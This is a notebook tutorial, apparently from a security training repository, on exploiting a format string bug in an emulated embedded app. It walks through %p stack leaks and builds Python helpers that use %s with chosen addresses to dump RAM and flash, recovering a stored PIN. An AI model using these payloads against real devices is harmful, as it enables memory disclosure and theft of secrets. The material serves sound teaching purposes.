<a href="https://colab.research.google.com/github/Jubicod/wsf/blob/main/tutorial1/help/b_format_string.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Exploiting the **format string** bug


In [ ]:
!git clone https://github.com/Jubicod/wsf.git
%run wsf/tutorial1/install.ipynb

# Blackbox exploitation

In [22]:
# let's observe the answer to a simple command
app=App()
app.send('U5555')

ready...
U5555

ok


332

In [24]:
# we can see that the command name ('U5555') is printed back by the app
# in fact anything we send is echoed
app.send('hello')

hello

Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error


89

In [25]:
# let's see if there is a format string bug
app.send('%p')

0x20004fe0

Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error


70

In [26]:
# some value was printed instead of our command: this is a format string bug !
# we can print a lot more
app.send('%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p')

0x20004fe0-0x2-0x0-0xff-0x0-0x0-0x0-0x0-0x8000267-0x20-0x252d7025

Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error
------CRASHED--------
Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)
PC = 0x70252d70


239

In [43]:
# we can see content of registers and stack !
# app printed values of R1, R2, R3, value at stack pointer address, value at stack pointer address + 4, ...
# R1 and R2 seems to point to RAM, most other are numerical values.
# we have a also a pointer to code (odd number starting with 0x08...). probably the function return address

# note that the application is crashing at the end (buffer overflow ? we'll look into that in another help file)

# this is giving a lot of already valuable informations. where RAM and code addresses are for instance
# we can try to see contents at address in R1 using %s (print as ascii)
app.reset()
app.send('#%s#')

ready...
##

Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error


'\x04'

In [44]:
# bad luck, R1 point to non ascii stuff
app.get_answer().split('#')[1]

'\x04'

In [ ]:
# all we could dump is the value 4

# try with R2
app.send('%p-%s-')

In [7]:
# let's have a closer look at the last format string ouput
app.reset()
app.send('%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p')

ready...
0x20004fe0-0x20000a28-0x0-0x0-0x0-0x0-0x20004fe0-0x20004fe4-0x8000267-0x20-0x252d7025

Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error
------CRASHED--------
Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)
PC = 0x70252d70


422

In [12]:
print(chr(0x25)+chr(0x70)+chr(0x2d)+chr(0x25))

%p-%


In [18]:
# 0x252d7025 is "p%-p" ! we are seeing our own buffer !!!
# let's try to control the value
app.reset()
app.send(0x41414141,'%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p')

ready...
AAAA0x20004fe0-0x20000a28-0x0-0x0-0x0-0x0-0x20004fe0-0x20004fe4-0x8000267-0x24-0x41414141

Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error
------CRASHED--------
Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)
PC = 0x252d7024


446

In [55]:
# we can see our own value here !!
# can we dump code or ram this way ?
# not so easy, can we cannot dump addresses with a zero bytes in it, otherwise it stops the format string
# we need the address to be at the end
# it takes a bit of trial an error, and a lot of %p, but finally we got it
app.reset()
app.send('%p%p%p%p%p%p%p%p%p%p%pp%p%p%p%p%p%p%p%p%p%p%p %p',0x41414141)

ready...
0x20004fe00x20000a280x00x00x3c0x2000501f0x20004fe00x20004fe40x80002670x340x70257025p0x702570250x702570250x702570250x702570250x257070250x257025700x257025700x257025700x257025700x257025700x70252070 0x41414141AAAA

Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error
------CRASHED--------
Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)
PC = 0x70257024


542

In [58]:
# it takes a bit of trial an error, and a lot of %p, but finally we got it
app.reset()
app.send('%p%p%p%p%p%p%p%p%p%p%pp%p%p%p%p%p%p%p%p%p%p%p %s',0x20000004)


ready...
0x20004fe00x20000a280x00x00x340x200050170x20004fe00x20004fe40x80002670x340x70257025p0x702570250x702570250x702570250x702570250x257070250x257025700x257025700x257025700x257025700x257025700x73252070 

Rx: read value at slot x. ex R2
Wxvvv: write value vvv at slot x. ex W137 writes 37 into slot 1
Ix: increment value in slot x
Uyyyyyyyy: unlock slots. yyyyy is the password. ex U1234
S: get status on slots
error
------CRASHED--------
Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)
PC = 0x70257024


542

In [ ]:
def dump_addr(add):
  app.reset()
  app.send('%p%p%p%p%p%p%p%p%p%p%pp%p%p%p%p%p%p%p%p%p%p%p#%s',add)
  a = app.get_answer()
  i = a.find('#')
  return ord(a[i+1])


def dump_all(begin, size):
  dump = {}
  for add in range(begin, begin+size):
    dump[add] = dump_addr(add)
  return dump

def dump_display(dump):
  for add in dump:
    print(hex(add),'=',hex(dump[add]))

app.send('w0254') # write 0xfe in slot 0 to recognize it
dump_all(0x20000000, 0x20)



In [18]:
dump_display(dump)
# we just dumped the RAM !!!
# including the PIN code (0x20000006 to 0x20000009)
# and all non-null slots values (even addresses starting at 0x2000000a)

0x20000000 = 0xa
0x20000001 = 0x1
0x20000002 = 0x2
0x20000003 = 0x3
0x20000004 = 0x1
0x20000005 = 0xff
0x20000006 = 0x32
0x20000007 = 0x33
0x20000008 = 0x30
0x20000009 = 0x34
0x2000000a = 0xfe
0x2000000b = 0xb
0x2000000c = 0x62
0x2000000d = 0xb
0x2000000e = 0x63
0x2000000f = 0xb
0x20000010 = 0x64
0x20000011 = 0x9
0x20000012 = 0x78
0x20000013 = 0xd
0x20000014 = 0x79
0x20000015 = 0x3
0x20000016 = 0x7a
0x20000017 = 0x1
0x20000018 = 0x18
0x20000019 = 0x19
0x2000001a = 0x1a
0x2000001b = 0x1b
0x2000001c = 0x1c
0x2000001d = 0x1d
0x2000001e = 0x1e
0x2000001f = 0x1f


In [ ]:
# we can dump the start of the flash code too !!
dump_display(dump_all(0x08000000, 0x20))